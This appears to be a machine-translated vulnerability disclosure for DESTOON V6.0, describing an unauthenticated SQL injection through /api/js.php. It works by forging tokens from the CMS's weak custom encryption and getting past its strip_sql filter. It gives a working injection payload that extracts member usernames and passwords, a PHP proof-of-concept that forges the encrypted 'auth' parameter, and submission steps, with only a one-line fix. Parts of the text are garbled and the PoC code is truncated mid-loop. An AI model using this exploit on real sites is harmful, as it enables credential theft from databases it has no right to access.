DESTOON V6.0 () Front-end does not need to log on to SQL Injection

DESTOON V6.0 () Front-end does not need to log on to SQL Injection

I watched it for one night. Fortunately,
It involves algorithms (non-violent) and some SQL postures.
For vulnerabilities submitted overnight, it may be a bit unclear about the algorithm analysis, so I will repeat them several times =
After writing so much, I just want to find the essence ~

Detailed description:

---------------------------------------------------------------------

#1 algorithm analysis

-------------

Compared with the previous brute force hacker attack in Somalia, the latest algorithm and great improvements have been made.
 

function encrypt($txt, $key = '') {$key or $key = DT_KEY;$rnd = random(32);$txt = $txt.substr($key, 0, 3);$len = strlen($txt);$ctr = 0;$str = '';for($i = 0; $i < $len; $i++) {$ctr = $ctr == 32 ? 0 : $ctr;$str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);}return str_replace(array('=', '+', '/', '0x', '0X'), array('', '-P-', '-S-', '-Z-', '-X-'), base64_encode(kecrypt($str, $key)));}function decrypt($txt, $key = '') {$key or $key = DT_KEY;$txt = kecrypt(base64_decode(str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), $txt)), $key);$len = strlen($txt);$str = '';for($i = 0; $i < $len; $i++) {$tmp = $txt[$i];$str .= $txt[++$i] ^ $tmp;}return substr($str, -3) == substr($key, 0, 3) ? substr($str, 0, -3) : '';}function kecrypt($txt, $key) {$key = md5($key);$len = strlen($txt);$ctr = 0;$str = '';for($i = 0; $i < $len; $i++) {$ctr = $ctr == 32 ? 0 : $ctr;$str .= $txt[$i] ^ $key[$ctr++];}return $str;}

We can see that the iv vector is changed from $ rnd = md5 (microtime () to $ rnd = random (32 );

If this is the case, it can be quickly reversed,

However, we can see that it adds

return substr($str, -3) == substr($key, 0, 3) ? substr($str, 0, -3) : '';

Used to judge data integrity. We reverse derive the ciphertext restoration process.

1. first, base64_decode (str_replace (array ('-P-', '-S-', '-Z-', '-X-'), array ('+ ', '/', '0x ', '0x'), $ txt) for special symbol replacement and base64 decoding.

2. Import kecrypt.

(Because the mathematical formula is not good, the image is uploaded --)
 

 

Conclusion:

For the front N-6 bit of the ciphertext, the I, I + 1 bit corresponds to the I bit of the plaintext do exclusive or operation (I is an even number) the result is a fixed value (Ki ^ Ki + 1)

For the last 6 digits of the ciphertext, the value remains unchanged when the length of the two ciphertext is equal to the remainder of 32.

That is to say, to obtain the ciphertext corresponding to the plaintext of x, you only need to know the ciphertext corresponding to the plaintext of y. Where

(2x+6)%32=(2y+6)%32.

-----------------------------------------------

#2 waf Bypass

-----------

In/api/js. php,
 

 $_SERVER['REQUEST_URI'] = '';require '../common.inc.php';header("Content-type:text/javascript");check_referer() or exit('document.write("

Invalid Referer ");');
$ Tag = isset ($ auth )? Strip_ SQL (decrypt ($ auth )):'';
$ Tag or exit ('document. write ("Bad Parameter ");');
Foreach (array ($ DT_PRE, '#', '$', '%', '&', 'table', 'fields', 'Password', 'payword ', 'debug') as $ v ){
Strpos ($ tag, $ v) ===false or exit ('document. write ("Bad Parameter ");');
}
Ob_start ();
Tag ($ tag );
$ Data = ob_get_contents ();
Ob_clean ();
Echo 'document. write (\ ''. dwrite ($ data? $ Data: 'no Data or Bad Parameter ').'\');';
?>

Called, followed by the tag

Function tag ($ parameter, $ expires = 0) {... // Save the meaningless code parse_str ($ parameter, $ par); if (! Is_array ($ par) return ''; $ par = dstripslashes ($ par); extract ($ par, EXTR_SKIP); ...... $ order = $ order? 'ORDER '. $ order :'';....... $ query = "SELECT ". $ fields. "FROM ". $ table. "WHERE ". $ condition. $ order. "LIMIT ". $ offset. ",". $ pagesize;

We can see that fields table condition order offset pagesize is not enclosed in single quotes.

However

foreach(array($DT_PRE, '#', '$', '%', '&', 'table', 'fields', 'password', 'payword', 'debug') as $v) {strpos($tag, $v) === false or exit('document.write("

Bad Parameter ");');

We can only control the condition order offset pagesize.

The next step is to bypass strip_ SQL.

function strip_sql($string, $type = 1) {$match = array("/union/i","/where/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\(\+@])/i","/update([\s\*\/\-\(\+@])/i","/replace([\s\*\/\-\(\+@])/i","/delete([\s\*\/\-\(\+@])/i","/drop([\s\*\/\-\(\+@])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i");$replace = array('union','where','outfile','dumpfile','0x\\1','select\\1from','select\\1','update\\1','replace\\1','delete\\1','drop\\1','load_file(','substring(','substr(','left(','concat(','concat_ws(','make_set(','ascii(','hex(','ord(','char(');if($type) {return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);} else {return str_replace(array('d', 'e', 'g', 'i', 'n','p', 'r', 's', 't', 'x'), array('d', 'e', 'g', 'i', 'n', 'p', 'r', 's', 't', 'x'), $string);}}

This filtering is terrible.

Select any character from and select xxx cannot,

However, note that the $ offset. ",". $ pagesize; after limit is spliced.

In this way, we can submit pagesize = from & offset = select xxx & moduleid = 2 & condition = userid = 1 to bypass the select * from detection,

Then select {x (name)} bypasses select xxx.

For convenience, enable debug for error injection demonstration.

The payload for the test is

pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1

A total of 193 bytes. Based on the preceding formula (2x + 6) % 32 = (2y + 6) % 32, we only need to find a ciphertext with a known plaintext of 17 bytes.

You can quickly find the company contact information.
 

Proof of vulnerability:

Enter poc.

 function cracked($Expressly,$Ciphertext,$str){$Ciphertext=str_replace(array('-P-', '-S-', '-Z-', '-X-'),array('+', '/', '0x', '0X'),$Ciphertext);$Ciphertext = base64_decode($Ciphertext);$c=strlen($Ciphertext);$text2="a";$j=0;$s=0;for($i=0;$i
 
  if($j==32){$j=0;$s=0;}$tmp=$Ciphertext[$j]^$Ciphertext[$j+1];$tmp=$tmp^$Expressly[$s];$tmp=$tmp^$str[$i];$text1=$tmp^$text2;$xxoo =$xxoo.$text2.$text1;$j=$j+2;}for($i=5;$i>=1;$i=$i-2){$tmp=$Ciphertext[$c-$i]^$Ciphertext[$c-$i-1]^'a';$xxoo = $xxoo.'a'.$tmp;}echo str_replace(array('+', '/', '0x', '0X'),array('-P-', '-S-', '-Z-', '-X-'),base64_encode($xxoo));}cracked("[email protected]","f018SggzVGUtHlo6J0ZaOg5rekJ6bnUGdQBgF1FhKURALgJiClMrTg",'pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1');?>
 

Enter the obtained value in auth.

Submit/api/js. php? Auth = xxx

Modify Referer to inject.

Solution:

Modify the algorithm. See dz's.